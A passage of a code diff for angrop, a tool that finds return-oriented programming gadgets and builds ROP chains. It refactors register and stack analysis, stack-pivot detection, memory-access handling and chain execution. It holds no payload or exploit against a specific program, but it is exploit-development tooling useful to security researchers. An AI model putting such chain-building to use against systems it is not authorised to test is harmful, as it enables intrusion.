do_cond_branch) return gadget - def _analyze_concrete_regs(self, init_state, final_state, gadget): + def _analyze_concrete_regs(self, final_state, gadget): """ collect registers that are concretized after symbolically executing the block (for example, xor rax, rax) """ - if type(gadget) == SyscallGadget: - state = self._windup_to_presyscall_state(final_state, init_state) - else: - state = final_state - for reg in self.arch.reg_set: - val = state.registers.load(reg) + for reg in self.arch.reg_list: + val = final_state.registers.load(reg) if val.symbolic: continue - gadget.concrete_regs[reg] = state.solver.eval(val) + gadget.concrete_regs[reg] = final_state.solver.eval(val) - def _check_reg_changes(self, final_state, init_state, gadget): + def _check_reg_changes(self, final_state, _, 
gadget): """ Checks which registers were changed and which ones were popped :param final_state: the stepped path, init_state is an ancestor of it. @@ -450,7 +563,7 @@ def _check_reg_changes(self, final_state, init_state, gadget): if not isinstance(exit_action, angr.state_plugins.sim_action.SimActionExit): raise RopException("unexpected SimAction") - exit_target = exit_action.target.ast + exit_target = exit_action.target.ast # type: ignore stack_change = gadget.stack_change if type(gadget) == RopGadget else None @@ -459,10 +572,19 @@ def _check_reg_changes(self, final_state, init_state, gadget): # verify the stack controls it # we need to make sure they arent equal to the exit target otherwise they arent controlled # TODO what to do about moves to bp - if final_state.registers.load(reg) is exit_target: + ast = final_state.registers.load(reg) + if ast is exit_target or ast.variables.intersection(exit_target.variables): gadget.changed_regs.add(reg) - elif self._check_if_stack_controls_ast(final_state.registers.load(reg), init_state, stack_change): - gadget.popped_regs.add(reg) + elif self._check_if_stack_controls_ast(ast, final_state, stack_change): + if ast.op == 'Concat': + raise RopException("cannot handle Concat") + bits = self.project.arch.bits + extended = rop_utils.bits_extended(ast) + if extended is not None and bits == 64: + if extended <= 32: + bits = 32 + pop = RopRegPop(reg, bits) + gadget.reg_pops.add(pop) gadget.changed_regs.add(reg) else: gadget.changed_regs.add(reg) @@ -478,13 +600,43 @@ def _check_reg_change_dependencies(self, symbolic_state, symbolic_p, gadget): # skip popped regs if reg in gadget.popped_regs: continue - # check its dependencies + # check its dependencies and controllers dependencies = self._get_reg_dependencies(symbolic_p, reg) if len(dependencies) != 0: gadget.reg_dependencies[reg] = set(dependencies) - controllers = self._get_reg_controllers(symbolic_state, symbolic_p, reg, dependencies) - if len(controllers) != 0: - 
gadget.reg_controllers[reg] = set(controllers) + controllers = self._get_reg_controllers(symbolic_state, symbolic_p, reg, dependencies) + if controllers: + gadget.reg_controllers[reg] = set(controllers) + + def _check_pop_equal_set(self, gadget, final_state): + """ + identify the situation where the final registers are dependent on each other + e.g. in `pop rax; mov rbx, rax; add rbx, 1; ret;` rax and rbx are set by the same variable + """ + + d = defaultdict(list) + for reg in self.arch.reg_list: + ast = final_state.registers.load(reg) + for v in ast.variables: + d[v].append(reg) + for v, regs in d.items(): + if not regs: + continue + if not v.startswith("symbolic_stack"): + continue + gadget.pop_equal_set.add(tuple(regs)) + + @staticmethod + def _is_add_int(final_val, init_val): + if final_val.depth != 2 or final_val.op not in ("__add__", "__sub__"): + return False + arg0 = final_val.args[0] + arg1 = final_val.args[1] + if arg0 is init_val: + return not arg1.symbolic + if arg1 is init_val: + return not arg0.symbolic + return False def _check_reg_movers(self, init_state, final_state, gadget): """ @@ -502,9 +654,14 @@ def _check_reg_movers(self, init_state, final_state, gadget): if not var_name.startswith("sreg_"): continue from_reg = var_name[5:].split('-')[0] + # rax->rax (32bit) is not a move, it is a register change + if from_reg == reg: + continue init_val = init_state.registers.load(from_reg) if init_val is final_val: gadget.reg_moves.append(RopRegMove(from_reg, reg, self.project.arch.bits)) + elif self._is_add_int(final_val, init_val): # rax = rbx + should be also considered as move + gadget.reg_moves.append(RopRegMove(from_reg, reg, self.project.arch.bits)) else: # try lower 32 bits (this is intended for amd64) # TODO: do this for less bits too? 
@@ -526,7 +683,7 @@ def _check_for_control_type(self, init_state, final_state): return 'syscall' # the ip is controlled by stack (ret) - if self._check_if_stack_controls_ast(ip, init_state): + if self._check_if_stack_controls_ast(ip, final_state): return "stack" # the ip is not controlled by regs/mem @@ -570,13 +727,11 @@ def _check_if_jump_gadget(final_state, init_state): return True - def _check_if_stack_controls_ast(self, ast, initial_state, gadget_stack_change=None): + @staticmethod + def _check_if_stack_controls_ast(ast, final_state, gadget_stack_change=None): if gadget_stack_change is not None and gadget_stack_change <= 0: return False - # if we had the lemma cache this might be already there! - test_val = 0x4242424242424242 % (1 << self.project.arch.bits) - # TODO add test where we recognize a value past the end of the stack frame isn't controlled # this is an annoying problem but this code should handle it @@ -584,17 +739,12 @@ def _check_if_stack_controls_ast(self, ast, initial_state, gadget_stack_change=N if len(ast.variables) != 1 or not list(ast.variables)[0].startswith("symbolic_stack"): return False - stack_bytes_length = self._stack_bsize # number of controllable bytes - if gadget_stack_change is not None: - stack_bytes_length = min(max(gadget_stack_change, 0), stack_bytes_length) - concrete_stack = claripy.BVV(b"B" * stack_bytes_length) - const = initial_state.memory.load(initial_state.regs.sp, stack_bytes_length) == concrete_stack - test_constraint = ast != test_val - # stack must have set the register and it must be able to set the register to all 1's or all 0's - ans = not initial_state.solver.satisfiable(extra_constraints=(const, test_constraint,)) and \ - rop_utils.fast_unconstrained_check(initial_state, ast) - - return ans + # check whether it is loosely constrained if it is constrained + if ast.variables.intersection(final_state.solver._solver.variables): + return rop_utils.loose_constrained_check(final_state, ast) + # if it is not 
constrained, check whether it is a decent ast + # (symbolic_stack_0_0_32 >> 0x1f) is not because we only control 1 bit + return rop_utils.fast_unconstrained_check(final_state, ast) def _check_if_stack_pivot(self, init_state, final_state): ip_variables = list(final_state.ip.variables) @@ -626,7 +776,8 @@ def _check_if_stack_pivot(self, init_state, final_state): return None # if the saved ip is too far away from the final sp, that's a bad gadget - sols = final_state.solver.eval_upto(final_state.regs.sp - saved_ip_addr, 2) + sols = final_state.solver.eval_to_ast(final_state.regs.sp - saved_ip_addr, 2) + sols = [x.concrete_value for x in sols] if len(sols) != 1: # the saved ip has a symbolic distance from the final sp, bad return None offset = sols[0] @@ -658,11 +809,12 @@ def _compute_sp_change(self, init_state, final_state, gadget): raise RopException("SP has multiple dependencies") if len(dependencies) == 0 and sp_change.symbolic: raise RopException("SP change is uncontrolled") - assert self.arch.base_pointer not in dependencies + assert not dependencies if len(dependencies) == 0 and not sp_change.symbolic: stack_changes = [init_state.solver.eval(sp_change)] elif list(dependencies)[0] == self.arch.stack_pointer: - stack_changes = init_state.solver.eval_upto(sp_change, 2) + stack_changes = init_state.solver.eval_to_ast(sp_change, 2) + stack_changes = [x.concrete_values for x in stack_changes] else: raise RopException("SP does not depend on SP or BP") @@ -670,16 +822,21 @@ def _compute_sp_change(self, init_state, final_state, gadget): raise RopException("SP change is symbolic") gadget.stack_change = self._to_signed(stack_changes[0]) + if gadget.stack_change % self.project.arch.bytes != 0 or abs(gadget.stack_change) > 0x1000: + raise RopException("bad SP") elif type(gadget) is PivotGadget: - # FIXME: step_to_unconstrained_successor is not compatible with conditional_branches - final_state = rop_utils.step_to_unconstrained_successor(self.project, state=init_state, 
precise_action=True) dependencies = self._get_reg_dependencies(final_state, "sp") last_sp = None init_sym_sp = None # type: ignore prev_act = None bits = self.project.arch.bits + max_prev_pivot_sc = 0 for act in final_state.history.actions: + if act.type == 'mem' and not act.addr.ast.symbolic: + end = act.addr.ast.concrete_value + act.size//8 + sc = end - self._concrete_sp + max_prev_pivot_sc = max(max_prev_pivot_sc, sc) if act.type == 'reg' and act.action == 'write' and act.size == bits and \ act.storage == self.arch.stack_pointer: if not act.data.ast.symbolic: @@ -693,7 +850,10 @@ def _compute_sp_change(self, init_state, final_state, gadget): else: gadget.stack_change = 0 - assert init_sym_sp is not None, "there is no sybmolic sp, how does the pivoting work?" + gadget.stack_change_before_pivot = max_prev_pivot_sc + + if init_sym_sp is None: + raise RopException("PivotGadget does not work with conditional branches") # if is popped from stack, we need to compensate for the popped sp value on the stack # if it is a pop, then sp comes from stack and the previous action must be a mem read @@ -704,12 +864,19 @@ def _compute_sp_change(self, init_state, final_state, gadget): gadget.stack_change += self.project.arch.bytes assert init_sym_sp is not None - sols = final_state.solver.eval_upto(final_state.regs.sp - init_sym_sp, 2) + sols = final_state.solver.eval_to_ast(final_state.regs.sp - init_sym_sp, 2) + sols = [x.concrete_value for x in sols] if len(sols) != 1: raise RopException("This gadget pivots more than once, which is currently not handled") gadget.stack_change_after_pivot = sols[0] gadget.sp_reg_controllers = set(self._get_reg_controllers(init_state, final_state, 'sp', dependencies)) gadget.sp_stack_controllers = {x for x in final_state.regs.sp.variables if x.startswith("symbolic_stack_")} + if gadget.stack_change_before_pivot % self.project.arch.bytes != 0 or \ + abs(gadget.stack_change_before_pivot) > 0x1000: + raise RopException("bad SP") + if 
gadget.stack_change_after_pivot % self.project.arch.bytes != 0 or \ + abs(gadget.stack_change_after_pivot) > 0x1000: + raise RopException("bad SP") else: raise NotImplementedError(f"Unknown gadget type {type(gadget)}") @@ -721,8 +888,19 @@ def _build_mem_access(self, a, gadget, init_state, final_state): # handle the memory access address # case 1: the address is not symbolic - if not a.addr.ast.symbolic: - mem_access.addr_constant = init_state.solver.eval(a.addr.ast) + if not a.addr.ast.symbolic or all(x.startswith('sym_addr_') for x in a.addr.ast.variables): + if not a.addr.ast.symbolic: + addr_constant = a.addr.ast.concrete_value + else: + addr_constant = final_state.solver.eval(a.addr.ast) + mem_access.addr_constant = addr_constant + mem_access.stack_offset = addr_constant - init_state.regs.sp.concrete_value + if not final_state.regs.sp.symbolic: + # check whether this is a pointer to a known mapping, these are not considered out-of-patch + if self.project.loader.find_object_containing(addr_constant): + pass + elif not init_state.regs.sp.concrete_value <= addr_constant < final_state.regs.sp.concrete_value: + mem_access.out_of_patch = True # case 2: the symbolic address comes from registers elif all(x.startswith("sreg_") for x in a.addr.ast.variables): mem_access.addr_dependencies = rop_utils.get_ast_dependency(a.addr.ast) @@ -765,7 +943,10 @@ def _build_mem_access(self, a, gadget, init_state, final_state): if not succ_state.solver.satisfiable(extra_constraints=(test_constraint,)): mem_access.data_dependencies.add(reg) - mem_access.data_size = a.data.ast.size() + data_ast = a.data.ast + while data_ast.op in ('ZeroExt', 'SignExt'): + data_ast = data_ast.args[1] + mem_access.data_size = data_ast.size() mem_access.addr_size = a.addr.ast.size() return mem_access @@ -807,15 +988,19 @@ def _build_mem_change(self, read_action, write_action, gadget, init_state, final # such as mov rax, [rbx]; inc rax; mov [rbx], rax, # this gadget will be ignored by us, which is not 
great data_dependencies = rop_utils.get_ast_dependency(sym_data) - if len(data_dependencies) != 1: - return None - data_controllers = rop_utils.get_ast_controllers(init_state, sym_data, data_dependencies) - if len(data_controllers) != 1: - return None + data_controllers = set() + data_stack_controllers = set() + if len(data_dependencies): + data_controllers = rop_utils.get_ast_controllers(init_state, sym_data, data_dependencies) + if len(data_controllers) != 1: + return None + data_stack_controllers = {x for x in sym_data.variables if x.startswith('symbolic_stack')} + mem_change = self._build_mem_access(read_action, gadget, init_state, final_state) mem_change.op = write_action.data.ast.op mem_change.data_dependencies = data_dependencies + mem_change.data_stack_controllers = data_stack_controllers mem_change.data_controllers = data_controllers mem_change.data_size = write_action.data.ast.size() mem_change.addr_size = write_action.addr.ast.size() @@ -887,15 +1072,38 @@ def _analyze_mem_access(self, final_state, init_state, gadget): if pivot_done and a.addr.ast.symbolic and not a.addr.ast.variables - sp_vars: continue - # ignore read/write on stack + # ignore read/write within the stack patch if not a.addr.ast.symbolic: - addr_constant = init_state.solver.eval(a.addr.ast) - stack_min_addr = self._concrete_sp - 0x20 - # TODO should this be changed, so that we can more easily understand writes outside the frame - stack_max_addr = max(stack_min_addr + self._stack_bsize, stack_min_addr + gadget.stack_change) - if addr_constant is not None and \ - stack_min_addr <= addr_constant < stack_max_addr: + addr_constant = a.addr.ast.concrete_value + + # check whether the access is within the stack patch + # we ignore pushes, which will lead to under patch write then load + upper_bound = (1< 0x400: + return False + all_mem_actions.append(a) # step 2: identify memory change accesses by indexing using the memory address as the key @@ -919,7 +1127,9 @@ def _analyze_mem_access(self, 
final_state, init_state, gadget): for m in d[addr]: all_mem_actions.remove(m) - if len(all_mem_actions) + len(gadget.mem_changes) > self.arch.max_sym_mem_access: + sym_accesses = [ m for m in all_mem_actions if m.addr.ast.symbolic ] + sym_accesses += [m for m in gadget.mem_changes if m.is_symbolic_access()] + if len(sym_accesses) > self.arch.max_sym_mem_access: return False # step 3: add all left memory actions to either read/write memory accesses stashes @@ -986,7 +1196,7 @@ def _get_reg_writes(self, path): if a.type == "reg" and a.action == "write": try: reg_name = rop_utils.get_reg_name(self.project.arch, a.offset) - if reg_name in self.arch.reg_set: + if reg_name in self.arch.reg_list: all_reg_writes.add(reg_name) elif reg_name != self.arch.stack_pointer: l.info("reg write from register not in reg_set: %s", reg_name) @@ -994,5 +1204,94 @@ def _get_reg_writes(self, path): l.debug(e) return all_reg_writes + def _block_has_ip_relative(self, addr, bl): + """ + Checks if a block has any ip relative instructions + """ + # if thumb mode, the block needs to parsed very carefully + if addr & 1 == 1 and self.project.arch.bits == 32 and self.project.arch.name.startswith('ARM'): + # thumb mode has this conditional instruction thingy, which is terrible for vex statement + # comparison. 
We inject a ton of fake statements into the program to ensure vex that this gadget + # is not a conditional instruction + MMAP_ADDR = 0x1000 + test_addr = MMAP_ADDR + 0x200+1 + if self.project.loader.memory.min_addr > MMAP_ADDR: + # a ton of `pop {pc}` + self.project.loader.memory.add_backer(MMAP_ADDR, b'\x00\xbd'*0x100+b'\x00'*0x200) + + # create the block without using the cache + engine = self.project.factory.default_engine + bk = engine._use_cache + engine._use_cache = False + self.project.loader.memory.store(test_addr-1, bl.bytes + b'\x00'*(0x200-len(bl.bytes))) + bl2 = self.project.factory.block(test_addr) + engine._use_cache = bk + else: + test_addr = 0x41414140 + addr % 0x10 + bl2 = self.project.factory.block(test_addr, insn_bytes=bl.bytes) + + # now diff the blocks to see whether anything constants changes + try: + diff_constants = differing_constants(bl, bl2) + except UnmatchedStatementsException: + return True + # check if it changes if we move it + bl_end = addr + bl.size + bl2_end = test_addr + bl2.size + filtered_diffs = [] + for d in diff_constants: + if d.value_a < addr or d.value_a >= bl_end or \ + d.value_b < test_addr or d.value_b >= bl2_end: + filtered_diffs.append(d) + return len(filtered_diffs) > 0 + + def _is_simple_gadget(self, addr, block): + """ + is the gadget a simple gadget like + pop rax; ret + """ + if block.vex.jumpkind not in {'Ijk_Boring', 'Ijk_Call', 'Ijk_Ret'}: + return False + if block.vex.jumpkind.startswith('Ijk_Sys_'): + return False + if block.vex.constant_jump_targets: + return False + if self._block_has_ip_relative(addr, block): + return False + return True -# TODO ip setters, ie call rax + def block_hash(self, block): + """ + a hash to uniquely identify a simple block + """ + if block.vex_nostmt.jumpkind.startswith('Ijk_Sys_'): + next_addr = block.addr + block.size + obj = self.project.loader.find_object_containing(next_addr) + if not obj: + return block.bytes + next_block = self.project.factory.block(next_addr, 
skip_stmts=True) + return block.bytes + next_block.bytes + return block.bytes + + def _static_analyze_first_block(self, addr): + try: + bl = self.project.factory.block(addr, skip_stmts=True) + if bl.size > self.arch.max_block_size: + return None, None + jumpkind = bl._vex_nostmt.jumpkind + if jumpkind in ('Ijk_SigTRAP', 'Ijk_NoDecode', 'Ijk_Privileged', 'Ijk_Yield'): + return None, None + if not self._allow_conditional_branches and len(bl._vex_nostmt.constant_jump_targets) > 1: + return None, None + if self._fast_mode and jumpkind not in ("Ijk_Ret", "Ijk_Boring") and not jumpkind.startswith('Ijk_Sys_'): + return None, None + if bl._vex_nostmt.instructions == 1 and jumpkind in ('Ijk_Boring', 'Ijk_Call'): + return None, None + if not self._block_make_sense(addr): + return None, None + except (SimEngineError, SimMemoryError): + return None, None + if self._is_simple_gadget(addr, bl): + h = self.block_hash(bl) + return h, addr + return None, addr diff --git a/angrop/rop.py b/angrop/rop.py index 8c2e6b2c..bf82b29f 100644 --- a/angrop/rop.py +++ b/angrop/rop.py @@ -22,7 +22,9 @@ class ROP(Analysis): """ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_access=None, - fast_mode=None, rebase=None, is_thumb=False, kernel_mode=False, stack_gsize=80): + fast_mode=None, rebase=None, is_thumb=False, kernel_mode=False, stack_gsize=80, + cond_br=False, max_bb_cnt=2 + ): """ Initializes the rop gadget finder :param only_check_near_rets: If true we skip blocks that are not near rets @@ -34,7 +36,9 @@ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_a :param is_thumb: execute ROP chain in thumb mode. Only makes difference on ARM architecture. 
angrop does not switch mode within a rop chain :param kernel_mode: find kernel mode gadgets - :param stack_gsize: change the maximum allowable stack change for gadgets + :param stack_gsize: change the maximum allowable stack change for gadgets, where + the max stack_change = stack_gsize * arch.bytes + :param cond_br: whether to support conditional branches, this option impacts gadget finding speed significantly :return: """ @@ -55,7 +59,8 @@ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_a # gadget finder configurations self.gadget_finder = GadgetFinder(self.project, fast_mode=fast_mode, only_check_near_rets=only_check_near_rets, max_block_size=max_block_size, max_sym_mem_access=max_sym_mem_access, - is_thumb=is_thumb, kernel_mode=kernel_mode, stack_gsize=stack_gsize) + is_thumb=is_thumb, kernel_mode=kernel_mode, stack_gsize=stack_gsize, + cond_br=cond_br, max_bb_cnt=max_bb_cnt) self.arch = self.gadget_finder.arch # chain builder @@ -122,7 +127,7 @@ def analyze_gadget(self, addr): self._screen_gadgets() return g - def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): + def analyze_gadget_list(self, addr_list, processes=4, show_progress=True, optimize=True): """ Analyzes a list of addresses to identify ROP gadgets. Saves rop gadgets in self.rop_gadgets @@ -135,22 +140,28 @@ def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): self._all_gadgets = self.gadget_finder.analyze_gadget_list( addr_list, processes=processes, show_progress=show_progress) self._screen_gadgets() + if optimize: + self.chain_builder.optimize(processes=processes) return self.rop_gadgets - def find_gadgets(self, processes=4, show_progress=True): + def find_gadgets(self, optimize=True, **kwargs): """ Finds all the gadgets in the binary by calling analyze_gadget on every address near a ret. 
Saves rop gadgets in self.rop_gadgets Saves syscall gadgets in self.syscall_gadgets Saves stack pivots in self.stack_pivots :param processes: number of processes to use + :param optimize: whether to run chain_builder.optimize(), this may take some time, + but makes the chain builder more powerful """ - self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets(processes=processes, - show_progress=show_progress) + self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets(**kwargs) self._screen_gadgets() + if optimize: + processes = kwargs.get('processes', 4) + self.chain_builder.optimize(processes=processes) return self.rop_gadgets - def find_gadgets_single_threaded(self, show_progress=True): + def find_gadgets_single_threaded(self, show_progress=True, optimize=True): """ Finds all the gadgets in the binary by calling analyze_gadget on every address near a ret Saves rop gadgets in self.rop_gadgets @@ -160,6 +171,8 @@ def find_gadgets_single_threaded(self, show_progress=True): self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets_single_threaded( show_progress=show_progress) self._screen_gadgets() + if optimize: + self.chain_builder.optimize(processes=1) return self.rop_gadgets def _get_cache_tuple(self): @@ -185,7 +198,7 @@ def save_gadgets(self, path): for g in self._all_gadgets: g.project = self.project - def load_gadgets(self, path): + def load_gadgets(self, path, optimize=True): """ Loads gadgets from a file. 
:param path: A path for a file where the gadgets are loaded @@ -193,6 +206,8 @@ def load_gadgets(self, path): with open(path, "rb") as f: cache_tuple = pickle.load(f) self._load_cache_tuple(cache_tuple) + if optimize: + self.chain_builder.optimize() def set_badbytes(self, badbytes): """ diff --git a/angrop/rop_block.py b/angrop/rop_block.py index c22bf7cd..f557ad48 100644 --- a/angrop/rop_block.py +++ b/angrop/rop_block.py @@ -1,9 +1,15 @@ +import logging + from .rop_chain import RopChain from .rop_value import RopValue from .rop_gadget import RopGadget +from .rop_effect import RopEffect +from .errors import RopException from . import rop_utils -class RopBlock(RopChain): +l = logging.getLogger(__name__) + +class RopBlock(RopChain, RopEffect): """ A mini-chain that satisfies the following conditions: 1. positive stack_change @@ -14,38 +20,8 @@ class RopBlock(RopChain): """ def __init__(self, project, builder, state=None, badbytes=None): - super().__init__(project, builder, state=state, badbytes=badbytes) - - self.stack_change = None - - # register effect information - self.changed_regs = set() - self.popped_regs = set() - # Stores the stack variables that each register depends on. - # Used to check for cases where two registers are popped from the same location. 
- self.popped_reg_vars = {} - self.concrete_regs = {} - self.reg_dependencies = {} # like rax might depend on rbx, rcx - self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) - self.reg_moves = [] - - # memory effect information - self.mem_reads = [] - self.mem_writes = [] - self.mem_changes = [] - - self.bbl_addrs = [] - self.isn_count: int = None # type: ignore - - @staticmethod - def new_sim_state(builder): - state = builder._sim_state - return state.copy() - - @property - def num_sym_mem_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return len([x for x in accesses if x.is_symbolic_access()]) + RopChain.__init__(self, project, builder, state=state, badbytes=badbytes) + RopEffect.__init__(self) def _chain_block(self, other): assert type(other) is RopBlock @@ -63,34 +39,31 @@ def _analyze_effect(self): ga = self._builder._gadget_analyzer + # clear the effects + rb.clear_effect() + # stack change ga._compute_sp_change(init_state, final_state, rb) - # clear the effects - rb.changed_regs = set() - rb.popped_regs = set() - rb.popped_reg_vars = {} - rb.concrete_regs = {} - rb.reg_dependencies = {} - rb.reg_controllers = {} - rb.reg_moves = [] - rb.mem_reads = [] - rb.mem_writes = [] - rb.mem_changes = [] - # reg effect ga._check_reg_changes(final_state, init_state, rb) ga._check_reg_change_dependencies(init_state, final_state, rb) ga._check_reg_movers(init_state, final_state, rb) + ga._check_pop_equal_set(rb, final_state) # mem effect - ga._analyze_concrete_regs(init_state, final_state, rb) + ga._analyze_concrete_regs(final_state, rb) ga._analyze_mem_access(final_state, init_state, rb) rb.bbl_addrs = list(final_state.history.bbl_addrs) project = init_state.project rb.isn_count = sum(project.factory.block(addr).instructions for addr in rb.bbl_addrs) + # conditional branch analysis + ga._cond_branch_analysis(rb, final_state) + if rb.branch_dependencies: + raise RopException("RopBlock 
should not have conditional branches") + def sim_exec(self): project = self._p # this is different RopChain.exec because the execution needs to be symbolic @@ -104,24 +77,12 @@ def sim_exec(self): simgr = self._p.factory.simgr(state, save_unconstrained=True) while simgr.active: simgr.step() - assert len(simgr.active + simgr.unconstrained) == 1 + if len(simgr.active + simgr.unconstrained) != 1: + l.warning("fail to sim_exec:\n%s", self.dstr()) + raise RopException("fail to sim_exec") final_state = simgr.unconstrained[0] return state, final_state - def import_gadget_effect(self, gadget): - self.stack_change = gadget.stack_change - self.changed_regs = gadget.changed_regs - self.popped_regs = gadget.popped_regs - self.popped_reg_vars = gadget.popped_reg_vars - self.concrete_regs = gadget.concrete_regs - self.reg_dependencies = gadget.reg_dependencies - self.reg_controllers = gadget.reg_controllers - self.reg_moves = gadget.reg_moves - self.mem_reads = gadget.mem_reads - self.mem_writes = gadget.mem_writes - self.mem_changes = gadget.mem_changes - self.isn_count = gadget.isn_count - @staticmethod def from_gadget(gadget, builder): assert isinstance(gadget, RopGadget) @@ -132,7 +93,10 @@ def from_gadget(gadget, builder): # build the block(chain) state first project = builder.project bytes_per_pop = project.arch.bytes - state = RopBlock.new_sim_state(builder) + state = rop_utils.make_symbolic_state( + builder.project, + builder.arch.reg_list, + gadget.stack_change//bytes_per_pop) next_pc_val = rop_utils.cast_rop_value( state.solver.BVS("next_pc", project.arch.bits), project, @@ -144,7 +108,7 @@ def from_gadget(gadget, builder): # now build the block(chain) rb = RopBlock(project, builder, state=state, badbytes=builder.badbytes) - rb.import_gadget_effect(gadget) + rb.import_effect(gadget) # fill in values and gadgets value = RopValue(gadget.addr, project) @@ -165,8 +129,36 @@ def from_gadget(gadget, builder): def from_gadget_list(gs, builder): assert gs rb = 
RopBlock.from_gadget(gs[0], builder) + project = builder.project + arch_bytes = project.arch.bytes for g in gs[1:]: - rb = rb._chain_block(RopBlock.from_gadget(g, builder)) + if g.self_contained: + rb = rb._chain_block(RopBlock.from_gadget(g, builder)) + elif g.stack_change >= 0 and g.transit_type == 'jmp_reg': + init_state, final_state = rb.sim_exec() + new_vals = [] + for offset in range(0, g.stack_change, arch_bytes): + tmp = final_state.memory.load(final_state.regs.sp+offset, + arch_bytes, + endness=project.arch.memory_endness) + new_vals.append(rop_utils.cast_rop_value(tmp, project)) + rb._values[rb.next_pc_idx()] = rop_utils.cast_rop_value(g.addr, project) # type: ignore + + final_state.solver.add(final_state.ip == g.addr) + final_state = rop_utils.step_to_unconstrained_successor(project, final_state) + rb._gadgets.append(g) + rb._values += new_vals + rb.payload_len += len(new_vals)*arch_bytes + ip_hash = hash(final_state.ip) + for idx, val in enumerate(rb._values): + if val.symbolic and hash(val.ast) == ip_hash: + next_pc_val = rop_utils.cast_rop_value( + init_state.solver.BVS("next_pc", project.arch.bits), + project, + ) + rb._values[idx] = next_pc_val + else: + raise NotImplementedError("plz create an issue") rb._analyze_effect() return rb @@ -181,22 +173,7 @@ def from_chain(chain): rb._analyze_effect() return rb - def has_symbolic_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return any(x.is_symbolic_access() for x in accesses) - def copy(self): cp = super().copy() - cp.changed_regs = set(self.changed_regs) - cp.popped_regs = set(self.popped_regs) - cp.popped_reg_vars = dict(self.popped_reg_vars) - cp.concrete_regs = dict(self.concrete_regs) - cp.reg_dependencies = dict(self.reg_dependencies) - cp.reg_controllers = dict(self.reg_controllers) - cp.stack_change = self.stack_change - cp.reg_moves = list(self.reg_moves) - cp.mem_reads = list(self.mem_reads) - cp.mem_writes = list(self.mem_writes) - cp.mem_changes = 
list(self.mem_changes) - cp.isn_count = self.isn_count + cp = self.copy_effect(cp) return cp diff --git a/angrop/rop_chain.py b/angrop/rop_chain.py index 8a0dd4a9..2d690f6e 100644 --- a/angrop/rop_chain.py +++ b/angrop/rop_chain.py @@ -1,5 +1,7 @@ import logging +import angr + from . import rop_utils from .errors import RopException from .rop_gadget import RopGadget @@ -22,18 +24,22 @@ def __init__(self, project, builder, state=None, badbytes=None): self._pie = self._p.loader.main_object.pic self._builder = builder - self._gadgets = [] - self._values = [] + self._gadgets: list[RopGadget] = [] # gadgets in the order of execution + self._values: list[RopValue] = [] # values on the stack + # use self.payload_len in presentation layer, use self._payload in internal stuff # because next_pc is an internal mechanism, we don't expose it to users self.payload_len = 0 # blank state used for solving - self._blank_state = self._p.factory.blank_state() if state is None else state + self._blank_state = rop_utils.make_symbolic_state(self._p, builder.arch.reg_list, 0) if state is None else state self.badbytes = badbytes if badbytes else [] self._timeout = self.cls_timeout + self._pivoted = False + self._init_sp = None + def __add__(self, other): # need to add the values from the other's stack and the constraints to the result state result = self.copy() @@ -54,6 +60,13 @@ def __add__(self, other): result.payload_len -= self._p.arch.bytes else: result._values.extend(other._values) + + # FIXME: cannot handle cases where a rop_block is used twice and have different constraints + # because right now symbolic values go with rop_blocks + if self._blank_state.solver._solver.variables.intersection(other._blank_state.solver._solver.variables): + if not result._blank_state.satisfiable(): + raise RopException("cannot use a rop_block with different constraints yet") + return result def set_timeout(self, timeout): @@ -115,13 +128,31 @@ def find_symbol(self, addr): return symbol.name return None 
- def exec(self, timeout=None): + def _check_pivot(self, s): + bits = self._p.arch.bits + for act in s.history.actions.hardcopy: + if act.type == 'reg' and act.action == 'write': + reg_name = self._p.arch.translate_register_name(act.offset) + if reg_name != self._builder.arch.stack_pointer: + continue + diff = act.data.ast - self._init_sp + if diff.symbolic: + self._pivoted = True + return + value = diff.concrete_value + if value >> (bits-1): # if the MSB is 1, this value is negative + value -= (1 << bits) + if value >= 0x1000 or value < -0x1000: + self._pivoted = True + return + + def exec(self, timeout=None, stop_at_pivot=False): """ symbolically execute the ROP chain and return the final state """ + # pylint: disable=possibly-used-before-assignment project = self._p state = self._blank_state.copy() - state.solver.reload_solver([]) # remove constraints concrete_vals = self._concretize_chain_values(timeout=timeout, preserve_next_pc=True, append_shift=False) # when the chain data includes symbolic values, we need to replace the concrete values @@ -140,10 +171,21 @@ def exec(self, timeout=None): state.memory.store(state.regs.sp+offset, val[0], project.arch.bytes, endness=project.arch.memory_endness) state.regs.pc = state.stack_pop() - # execute the chain using simgr + if stop_at_pivot: + self._pivoted = False + self._init_sp = state.regs.sp + bp = state.inspect.b('reg_write', when=angr.BP_AFTER, action=self._check_pivot) + simgr = project.factory.simgr(state, save_unconstrained=True) + + # execute the chain using simgr while simgr.active: simgr.step() + if stop_at_pivot and self._pivoted: + states = simgr.active + simgr.unconstrained + assert len(states) == 1 + states[0].inspect.remove_breakpoint('reg_write', bp) # type: ignore + return states[0] if len(simgr.active + simgr.unconstrained) != 1: code = self.payload_code(print_instructions=True) l.error("The following chain fails to execute!") @@ -164,7 +206,7 @@ def concrete_exec_til_addr(self, target_addr): def 
sim_exec_til_syscall(self): project = self._p - state = project.factory.blank_state() + state = self._blank_state.copy() for idx, val in enumerate(self._values): offset = idx*project.arch.bytes state.memory.store(state.regs.sp+offset, val.data, project.arch.bytes, endness=project.arch.memory_endness) @@ -205,7 +247,7 @@ def __concretize_chain_values(self, constraints=None): # for each byte, it should not be equal to any bad bytes # TODO: we should do the badbyte verification when adding values # not when concretizing them - for idx in range(ast.length//8): + for idx in range(ast.length//8): # type: ignore b = ast.get_byte(idx) constraints += [ b != c for c in self.badbytes] # apply the constraints @@ -366,3 +408,23 @@ def dstr(self): def pp(self): print(self.dstr()) + + def set_project(self, project): + self._p = project + for g in self._gadgets: + g.project = project + for val in self._values: + val._project = project + + def set_builder(self, builder): + self._builder = builder + + def __getstate__(self): + state = self.__dict__.copy() + state['_p'] = None + state['_builder'] = None + state['_blank_state'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) diff --git a/angrop/rop_effect.py b/angrop/rop_effect.py new file mode 100644 index 